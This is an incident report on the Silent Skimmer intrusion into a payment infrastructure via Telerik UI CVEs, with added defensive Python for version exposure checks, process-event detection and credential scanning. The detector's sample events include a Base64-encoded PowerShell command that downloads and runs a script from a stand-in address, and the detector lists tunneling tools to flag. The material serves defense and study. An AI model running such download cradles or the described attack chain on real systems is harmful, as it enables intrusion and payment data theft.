Full Report
In May 2024, researchers observed an attack by the Silent Skimmer threat actor, targeting a multinational organization’s payment infrastructure. This attack exploited known vulnerabilities in Telerik UI to gain unauthorized access and deploy various malicious tools, including ...
Analysis Summary
# Incident Report: Silent Skimmer Attack on Payment Infrastructure
## Executive Summary
In May 2024, the Silent Skimmer threat actor targeted a multinational organization's payment infrastructure, exploiting known vulnerabilities in Telerik UI for ASP.NET AJAX to gain initial access. The attackers deployed web shells and reverse shells, used the tunneling tool Fuso (alongside FRP) and the RingQ loader to maintain access and reach internal systems, and ran a compiled Python script that pulled payment card data directly from the payment database. The activity was identified and documented by external researchers, whose public report is dated November 7, 2024; the source does not say whether the victim detected it independently.
## Incident Details
- Discovery Date: November 7, 2024 (Public disclosure date by researchers)
- Incident Date: May 2024
- Affected Organization: Multinational Organization (unspecified)
- Sector: Payment/Financial Infrastructure
- Geography: Unknown
## Timeline of Events
### Initial Access
- Date/Time: May 2024 (Timeframe of first observed attack)
- Vector: Exploitation of known Telerik UI vulnerabilities.
- Details: Attackers exploited CVE-2017-11317 (weak, recoverable RadAsyncUpload encryption keys that allow arbitrary file upload) and CVE-2019-18935 (insecure .NET deserialization in the RadAsyncUpload handler) in Telerik UI for ASP.NET AJAX, chaining file upload into Remote Code Execution (RCE) on the targeted servers.
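The practical question this step raises for a defender is whether a given Telerik build is still in the affected range for these two CVEs. The following is an added example, not code from the researchers' report or from the page: it classifies Telerik UI for ASP.NET AJAX builds found in a host inventory by CVE exposure. The fix-release thresholds are this example's assumptions taken from the public advisories (R2 2017 SP1 for CVE-2017-11317, R1 2020 for CVE-2019-18935), and the inventory lines and hostnames are constructed sample data.

```python
"""Added example; not code from the researchers' report or from the page.
Classify Telerik UI for ASP.NET AJAX builds found in an inventory as
exposed to the two CVEs above. The fixed-version thresholds are this
example's assumptions taken from the public advisories, and the host
inventory lines are constructed sample data."""
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int]

# Assumed fix releases (NVD: CVE-2017-11317 affects builds before R2 2017 SP1,
# CVE-2019-18935 affects builds through 2019.3.1023, fixed in R1 2020).
FIXED: Dict[str, Version] = {
    "CVE-2017-11317": (2017, 2, 621),   # R2 2017 SP1
    "CVE-2019-18935": (2020, 1, 114),   # R1 2020
}

# Telerik builds look like YEAR.RELEASE.BUILD, optionally with a fourth
# assembly revision (e.g. 2018.1.117.45 in an assembly reference).
VERSION_RE = re.compile(r"\b(20\d{2})\.(\d)\.(\d{3,4})(?:\.\d+)?\b")


def parse_version(text: str) -> Optional[Version]:
    """Pull the Telerik build out of an assembly reference, a script URL
    or an inventory line; None when no build string is present."""
    m = VERSION_RE.search(text)
    return tuple(int(g) for g in m.groups()) if m else None


def exposed_cves(version: Version) -> List[str]:
    """CVEs whose fix release is newer than the observed build. Note that
    CVE-2019-18935 is only exploitable when the RadAsyncUpload keys are
    known, which CVE-2017-11317 (or a leaked web.config) provides."""
    return [cve for cve, fixed in FIXED.items() if version < fixed]


def assess_inventory(lines: List[str]) -> Dict[str, List[str]]:
    """Map 'host<TAB>assembly reference' inventory lines to CVE exposure.
    Hosts with no parseable Telerik build are reported as 'unknown'."""
    report = {}
    for line in lines:
        host, _, ref = line.partition("\t")
        ver = parse_version(ref)
        report[host] = exposed_cves(ver) if ver else ["unknown"]
    return report


# Constructed inventory (hostnames and builds are made up for the example).
SAMPLE_INVENTORY = [
    "pay-web01\tTelerik.Web.UI, Version=2016.2.504.45",
    "pay-web02\tTelerik.Web.UI, Version=2018.1.117.45",
    "pay-web03\tTelerik.Web.UI, Version=2020.1.114.45",
    "pay-web04\tno Telerik assembly found",
]

if __name__ == "__main__":
    for host, cves in assess_inventory(SAMPLE_INVENTORY).items():
        print(f"{host}: {', '.join(cves) if cves else 'not exposed to either CVE'}")
```

The version string is usually visible in the `Telerik.Web.UI` assembly reference in `web.config` or in the `Telerik.Web.UI.WebResource.axd` script URLs the application emits, so the same parser works on a config dump or on captured HTTP responses. A host that reports `unknown` should be treated as unassessed rather than safe.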
### Lateral Movement
- Date/Time: Post initial access
- Vector: Web shells and reverse shells planted after initial access, combined with reverse-proxy tunnels into the internal network.
- Details: Attackers ran reconnaissance commands (`whoami`, `ipconfig`, `netstat`) to map the environment, installed web shells and reverse shells for continued access, and used the tunneling tools Fuso and FRP to reach internal systems that were not directly exposed, bypassing network segmentation.
### Data Exfiltration/Impact
- Date/Time: Prior to discovery/reporting
- Vector: Compromised database connection.
- Details: A compiled Python script containing hard-coded credentials connected directly to the payment database, extracted payment information, and saved the data into a local CSV file for eventual exfiltration.
### Detection & Response
- Date/Time: Not stated in the source; the researchers' public report is dated November 7, 2024.
- Vector: External researcher observation of campaign activity.
- Details: The response actions taken by the targeted organization are not described in the source material; the researchers' analysis supplied the tools, techniques and indicators summarized here.
## Attack Methodology
- Initial Access: Exploitation of Telerik UI RCE vulnerabilities (CVE-2017-11317, CVE-2019-18935).
- Persistence: Deployment of web shells and reverse shells in strategic directories.
- Privilege Escalation: Not explicitly described in the source. Initial code execution ran with the privileges of the exploited ASP.NET application process (the IIS worker hosting Telerik UI), and the local reconnaissance that followed served to assess what those privileges allowed.
- Defense Evasion: Leveraging PowerShell commands, Base64-encoded payloads, and embedding malicious .NET code within legitimate binaries.
- Credential Access: Use of hard-coded credentials within a Python script to access the database.
- Discovery: Execution of basic system command-line utilities (`whoami`, `ipconfig`, `netstat`).
- Lateral Movement: Establishing network tunnels using Fuso and FRP to access internal infrastructure.
- Collection: Extracting payment information into a CSV file from the target database.
- Exfiltration: Not directly observed in the source; the CSV staged on disk and the tunnels already established indicate the intended path out.
- Impact: Theft of sensitive payment data.
## Impact Assessment
- Financial: Not quantified in the source; direct costs would include breach remediation and the downstream costs of stolen card data.
- Data Breach: Sensitive payment information extracted and staged for exfiltration.
- Operational: Direct targeting of payment gateways suggests potential disruption to transaction processing.
- Reputational: High risk due to the compromise of sensitive financial customer data.
## Indicators of Compromise
- Network Indicators: No IP addresses or domains are given in the source. Behaviorally, outbound connections from payment servers to reverse-proxy tools (FRP, Fuso) that expose internal systems.
- File Indicators: Presence of web shells, reverse shells, the Fuso tunneling tool, the RingQ loader, and a compiled Python script that connects to the payment database and writes a CSV.
- Behavioral Indicators: PowerShell invocations carrying Base64-encoded commands to conceal what is executed, IIS worker processes spawning shells, and network beaconing consistent with reverse shells.
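The behavioral indicators above translate directly into process-creation detections. The following is an added example, not code from the researchers' report or from the page: a small detector that runs over constructed Sysmon-style process events and flags the IIS worker spawning a shell, Base64-encoded PowerShell (decoded so the analyst sees the script rather than the blob), a reconnaissance burst, and a tunneling client. Host names, paths, timestamps and the 198.51.100.7 address are made up for the sample.

```python
"""Added example; not code from the researchers' report or from the page.
A small detector for the behavioural indicators listed above, run over
constructed Sysmon-style process-creation events. Host names, paths and
the 198.51.100.7 address are made up for the sample."""
import base64
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

RECON = {"whoami.exe", "ipconfig.exe", "netstat.exe", "systeminfo.exe", "tasklist.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WEB_SERVER = {"w3wp.exe"}            # IIS worker process hosting the Telerik UI application
TUNNEL_TOOLS = {"frpc.exe", "frps.exe", "fuso.exe"}
RECON_WINDOW = 120                    # seconds within which recon commands count as one burst
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Decode a -EncodedCommand argument; PowerShell expects Base64 over
    UTF-16LE, so that is what we reverse. None when absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events: List[Dict]) -> List[Tuple[str, str, int, str]]:
    """Return (rule, host, ts, detail) findings for process events with
    keys ts (epoch seconds), host, parent, image, cmdline."""
    findings = []
    recon_seen = defaultdict(list)   # (host, parent) -> [(ts, tool), ...]
    burst_reported = set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        img, parent = basename(ev["image"]), basename(ev["parent"])
        host, ts = ev["host"], ev["ts"]
        # Web shell behaviour: the IIS worker should never spawn a shell.
        if parent in WEB_SERVER and img in SHELLS:
            findings.append(("webshell_child", host, ts, f"{parent} -> {img}: {ev['cmdline']}"))
        # Base64-encoded PowerShell: surface the decoded script, not the blob.
        if img in {"powershell.exe", "pwsh.exe"}:
            script = decode_encoded_powershell(ev["cmdline"])
            if script:
                findings.append(("encoded_powershell", host, ts, script))
        # Reverse-proxy / tunnelling clients on a payment host.
        if img in TUNNEL_TOOLS:
            findings.append(("tunnel_tool", host, ts, ev["cmdline"]))
        # Reconnaissance burst: three distinct recon tools from the same
        # parent within RECON_WINDOW seconds, reported once per parent.
        if img in RECON:
            key = (host, parent)
            recon_seen[key].append((ts, img))
            recent = {tool for t, tool in recon_seen[key] if ts - t <= RECON_WINDOW}
            if len(recent) >= 3 and key not in burst_reported:
                burst_reported.add(key)
                findings.append(("recon_burst", host, ts, ", ".join(sorted(recent))))
    return findings


# Constructed sample: a web shell on an IIS payment server running recon,
# then a hidden encoded PowerShell download cradle, then an frp client.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')".encode("utf-16le")
).decode()
W3WP, CMD = r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    {"ts": 1000, "host": "pay-web01", "parent": W3WP, "image": CMD, "cmdline": "cmd.exe /c whoami"},
    {"ts": 1001, "host": "pay-web01", "parent": CMD, "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami"},
    {"ts": 1005, "host": "pay-web01", "parent": CMD, "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all"},
    {"ts": 1009, "host": "pay-web01", "parent": CMD, "image": r"C:\Windows\System32\netstat.exe", "cmdline": "netstat -ano"},
    {"ts": 1100, "host": "pay-web01", "parent": W3WP, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + ENCODED},
    {"ts": 1300, "host": "pay-web01", "parent": CMD, "image": r"C:\Windows\Temp\frpc.exe", "cmdline": "frpc.exe -c frpc.ini"},
    {"ts": 2000, "host": "pay-web01", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for rule, host, ts, detail in detect(SAMPLE_EVENTS):
        print(f"{ts} {host} {rule}: {detail}")
```

The `webshell_child` rule is the highest-value one on a payment web tier because the parent-child pair is almost never legitimate; the recon and encoded-PowerShell rules are noisier on administrative hosts and are best scoped to the servers that actually front the payment application.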
## Response Actions
*(Note: Specific response actions taken by the victim organization are not detailed in the summary material, thus this section is based on standard procedure following such an event type.)*
- Containment: Immediate isolation of affected payment gateway servers and segmentation of the compromised network segments. Revocation of any potentially compromised service accounts.
- Eradication: Removal of all deployed web shells, reverse shells, tunneling tools (Fuso, FRP) and loaders (RingQ). Forensic analysis of binaries suspected of carrying embedded malicious code, as described under Defense Evasion above.
- Recovery: Patching of Telerik UI instances against known CVEs. Rebuilding affected systems from trusted images and restoring database access after credential sanitization.
## Lessons Learned
- Legacy Vulnerability Exploitation: Known, older CVEs in third-party components (Telerik UI) remain a critical threat vector if patches are not prioritized.
- Defense Evasion Sophistication: Attackers employed advanced techniques (code embedding in binaries, heavy encoding) to bypass standard static analysis tools.
- Secrets Management: Hard-coded database credentials within an application present a high-value target once initial access is gained.
## Recommendations
- Patch Management: Immediately audit and apply patches for all internet-facing application server software, especially third-party components like Telerik UI, prioritizing vulnerabilities with public exploit code regardless of age; both CVEs used here are several years old.
- Network Hardening: Review firewall and proxy configurations to strictly limit outbound connections initiated from payment processing zones to prevent the successful deployment and use of reverse proxy tools (FRP).
- Credential Auditing: Implement secrets management tools to eliminate hard-coded credentials in application code, utilizing managed identity or vault solutions instead.
- Endpoint Detection: Deploy Endpoint Detection and Response (EDR) tooling that records PowerShell command lines (decoding Base64-encoded commands), flags IIS worker processes spawning shells, and detects the in-memory loading of embedded payloads used by loaders such as RingQ.
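The secrets-management lesson above (a hard-coded database credential inside the collection script) and the credential-auditing recommendation both come down to finding literal credentials in source before an attacker does. The following is an added example, not code from the researchers' report or from the page: a scanner for that pattern, shown against a constructed vulnerable snippet and its hardened form. The hostnames, account name, password and environment variable name are made up for the sample.

```python
"""Added example; not code from the researchers' report or from the page.
A scanner for the hard-coded database credential pattern described above,
shown against a constructed vulnerable snippet and its hardened form. The
hostnames, account and password strings are made up for the sample."""
import re
from typing import List, Tuple

# Constructed 'before': the credential travels with the script, exactly the
# property that made the collection tool self-sufficient once dropped.
VULNERABLE_SOURCE = '''import pyodbc
conn = pyodbc.connect("DRIVER={SQL Server};SERVER=pay-db01;DATABASE=cards;UID=svc_pay;PWD=Summer2024!")
'''

# Constructed 'after': the DSN comes from the runtime environment (populated
# by a vault or managed identity), so the source carries nothing reusable.
HARDENED_SOURCE = '''import os, pyodbc
conn = pyodbc.connect(os.environ["PAY_DB_DSN"])
'''

# Each pattern captures the secret value so it can be masked in the finding.
PATTERNS = [
    ("connection_string_password", re.compile(r"(?i)\b(?:pwd|password)\s*=\s*([^;\"'\s]+)")),
    ("quoted_password_literal",    re.compile(r"(?i)\b(?:pwd|password)\s*=\s*[\"']([^\"']+)[\"']")),
    ("db_url_with_password",       re.compile(r"(?i)\b\w+://[^:/\s]+:([^@\s]+)@")),
]


def mask(secret: str) -> str:
    """Keep two characters so the finding is recognisable without leaking it."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def find_hardcoded_credentials(source: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, pattern_name, masked_value) for every literal
    credential found in the given source text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in PATTERNS:
            for m in pattern.finditer(line):
                findings.append((lineno, name, mask(m.group(1))))
    return findings


if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_SOURCE), ("hardened", HARDENED_SOURCE)):
        print(label, find_hardcoded_credentials(src) or "clean")
```

Run the scanner over the application repository and over deployed scripts on the payment hosts themselves; a credential found only on disk and not in source control is a sign of exactly the dropped-tool pattern seen here. The hardened form still needs the environment populated by something with its own access control (a vault agent or managed identity), otherwise the secret has only moved.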